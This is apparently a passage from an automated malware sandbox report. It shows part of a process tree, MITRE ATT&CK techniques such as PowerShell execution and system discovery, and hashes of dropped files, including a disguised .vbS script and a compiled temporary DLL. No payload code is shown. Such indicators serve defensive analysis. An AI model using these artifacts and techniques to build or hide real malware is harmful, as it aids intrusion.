        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,10948378594366077686,16446051562923081794,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 /prefetch:2
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2760
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=iexplore.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff95a6046f8,0x7ff95a604708,0x7ff95a604718
        9⤵
        
        PID:2592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:540

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
437B

MD5
05592d6b429a6209d372dba7629ce97c

SHA1
b4d45e956e3ec9651d4e1e045b887c7ccbdde326

SHA256
3aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd

SHA512
caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
edd2ec0dbeb05fd1d0379568a3b59f3c

SHA1
6dbc073c493c82e278bdfae09d093ec628d45813

SHA256
340975c845b9d8ac73d5ae0b9b4d81c27ebb678fcaf3223987c3b06a5da6dc75

SHA512
8a47668a604b70e7bf351db2310ea86cd3a0c580918408a3e5f96b449bbe1acc0e73ed49d25c3305b171dea79afdb356fa5ff12e7d2d944ff8f424ba52b5bd2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe587ac9.TMP

Filesize
371B

MD5
201db6b5416754db76aa48ffe02557f4

SHA1
352015ac300cad6a46d0a7f2ee3b1805d728fa74

SHA256
79f2de375a35a1f137071cbbd6d1c970bdb19b96c4551f1b5b399d8dc34b4fb3

SHA512
3314a7a71c51a7219222443a2b36049665131ff3e64bb341d1fd5f1c279a26cd767b26dc319fbe56f83316b521ff3df529bca7b2419578a47a6052723613e6d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
2c3ccca65228adb29922c2010a429f68

SHA1
2c75811b7ddf8a3e44e5dae73a8faef2caf1b6dc

SHA256
6a20ae9aa31cb7800d2ab53a32413172006721b055df881f17c24e811c1ce8ba

SHA512
f2d6cdded24781e0d430e5b9e16a8174906715d5ced4b37893a692d04fcb164df2849d99adfa7f00346d114c386ef4007638d41bba5885d6701fe569da6ce568

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp

Filesize
1KB

MD5
5e652468a81741e20a523a1d52a51098

SHA1
e43f14c82e072cd329149782752857b87a397000

SHA256
db7916ffb77ef038384af175eab7310c4805ce60ad2e6b92826316c4dd88b811

SHA512
761d181529e7f4ecbcaa22ac5dd8d66286f63ee45fc961c729368eb6df1ba327fd6da2b0ab3a75173c8b4c4dd261f4fdf1714b16deaf96a119030899830f0fe0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q1y4fwfx.k2v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\udqta0rd\udqta0rd.dll

Filesize
3KB

MD5
10272600a4f63bdc071f3c83ea1ce922

SHA1
6e418833829202b915cb51bf7aba747125bbc084

SHA256
f355222bae063191545b4fdb68f1afed5adc540ffaf3089fb1fd97b2189f5038

SHA512
ccef4f7fd308ccd839d26e98b187e19167440118e2f769e17450d3996d93df713f5d159179645add5aae15c34c8639d8b4869b932bb2ca49203c41b1c472b6a9

Download Submit
C:\Users\Admin\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS

Filesize
1KB

MD5
a9de1dd61052fb7164600306135b0771

SHA1
4efefaf03b42637e74817b4695fc086b2d95191e

SHA256
bfbe88f62a33e1cd2289a9179dfe2151c9427c0ccd13753a029c3dcb78852fae

SHA512
9ce749ff8b7bb054b827534afbd900a44e6aa03e8818d4cf9121cc9e8448ebc0a21ce641e6db4d0824c14806cd34f8fee301a523c338526cb9c5757e1547f6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\udqta0rd\CSCC8AC4C2AE8DD4DFD9E9622399CC5D45B.TMP

Filesize
652B

MD5
52a89926708c4303c9719dbc4e5e0b99

SHA1
d6d58e2cbb510df81b1220e645db3205b98b273f

SHA256
d87407b9927165b1c5144ce9779fbfcd30458d9211ec81341582d4e5f7bd2813

SHA512
8aba28d238433aac10560945780615e34c00424908e1d6e5d1b577e2dc87809c5580fc83ca890e22cf6ab03c446de41acf5ff3f8ae9d1300b287fdbff3128558

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\udqta0rd\udqta0rd.0.cs

Filesize
496B

MD5
ee707a34980a4df56a07be04f7825b38

SHA1
65ce7b9161c445f33f2f28dc13c92872c209e83a

SHA256
fe3dc6c711ddb4c32c5ff8b18b557804d3180005bfa99a8dc02b945d70ea5cbc

SHA512
1fb569ac9eaca82c89cb3ed59bffe339fe579a62668ed4899d234ab64a4b08ead39c088db17d3745eb16b7f3428b6ed7eb664ed13f90b21d00759158a40f9cd5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\udqta0rd\udqta0rd.cmdline

Filesize
369B

MD5
c4f2b34aff3d3113b09e1b3f2bd7cbea

SHA1
2d3c073b36166f7f4d4e9265b24adccbaf5e6ff6

SHA256
cd22817170d14189b320a0c17624b53c70ebd1e5fc7eba87dcc743ddde1976bb

SHA512
505a3a0cd1f73642f09bb04d6896134cf9c01acbf78a7265afc59a4ea632a9467979f6600596b9daabcabcc9ccef232c5344261041948f629fa6be011c710386

Download Submit
memory/1028-92-0x0000000001150000-0x000000000115C000-memory.dmp

Filesize
48KB

Download
memory/1428-85-0x00000000060E0000-0x0000000006434000-memory.dmp

Filesize
3.3MB

Download
memory/1428-87-0x0000000007D70000-0x0000000007EC8000-memory.dmp

Filesize
1.3MB

Download
memory/1428-88-0x00000000155D0000-0x000000001566C000-memory.dmp

Filesize
624KB

Download
memory/1716-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/1716-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4448-41-0x0000000007400000-0x0000000007411000-memory.dmp

Filesize
68KB

Download
memory/4448-23-0x000000006D9C0000-0x000000006DD14000-memory.dmp

Filesize
3.3MB

Download
memory/4448-38-0x0000000007220000-0x000000000723A000-memory.dmp

Filesize
104KB

Download
memory/4448-39-0x0000000007280000-0x000000000728A000-memory.dmp

Filesize
40KB

Download
memory/4448-40-0x00000000074A0000-0x0000000007536000-memory.dmp

Filesize
600KB

Download
memory/4448-0-0x0000000070F6E000-0x0000000070F6F000-memory.dmp

Filesize
4KB

Download
memory/4448-42-0x0000000007430000-0x000000000743E000-memory.dmp

Filesize
56KB

Download
memory/4448-44-0x0000000007480000-0x000000000749A000-memory.dmp

Filesize
104KB

Download
memory/4448-45-0x0000000007470000-0x0000000007478000-memory.dmp

Filesize
32KB

Download
memory/4448-43-0x0000000007440000-0x0000000007454000-memory.dmp

Filesize
80KB

Download
memory/4448-36-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-35-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-34-0x0000000007170000-0x0000000007213000-memory.dmp

Filesize
652KB

Download
memory/4448-58-0x0000000007470000-0x0000000007478000-memory.dmp

Filesize
32KB

Download
memory/4448-33-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/4448-37-0x00000000078A0000-0x0000000007F1A000-memory.dmp

Filesize
6.5MB

Download
memory/4448-64-0x0000000070F6E000-0x0000000070F6F000-memory.dmp

Filesize
4KB

Download
memory/4448-65-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-22-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-70-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-21-0x000000006D820000-0x000000006D86C000-memory.dmp

Filesize
304KB

Download
memory/4448-20-0x0000000006E90000-0x0000000006EC2000-memory.dmp

Filesize
200KB

Download
memory/4448-19-0x0000000005F00000-0x0000000005F4C000-memory.dmp

Filesize
304KB

Download
memory/4448-18-0x0000000005ED0000-0x0000000005EEE000-memory.dmp

Filesize
120KB

Download
memory/4448-17-0x0000000005840000-0x0000000005B94000-memory.dmp

Filesize
3.3MB

Download
memory/4448-7-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4448-6-0x00000000055F0000-0x0000000005656000-memory.dmp

Filesize
408KB

Download
memory/4448-5-0x0000000004E90000-0x0000000004EB2000-memory.dmp

Filesize
136KB

Download
memory/4448-4-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-2-0x0000000004FC0000-0x00000000055E8000-memory.dmp

Filesize
6.2MB

Download
memory/4448-3-0x0000000070F60000-0x0000000071710000-memory.dmp

Filesize
7.7MB

Download
memory/4448-1-0x0000000000F00000-0x0000000000F36000-memory.dmp

Filesize
216KB

Download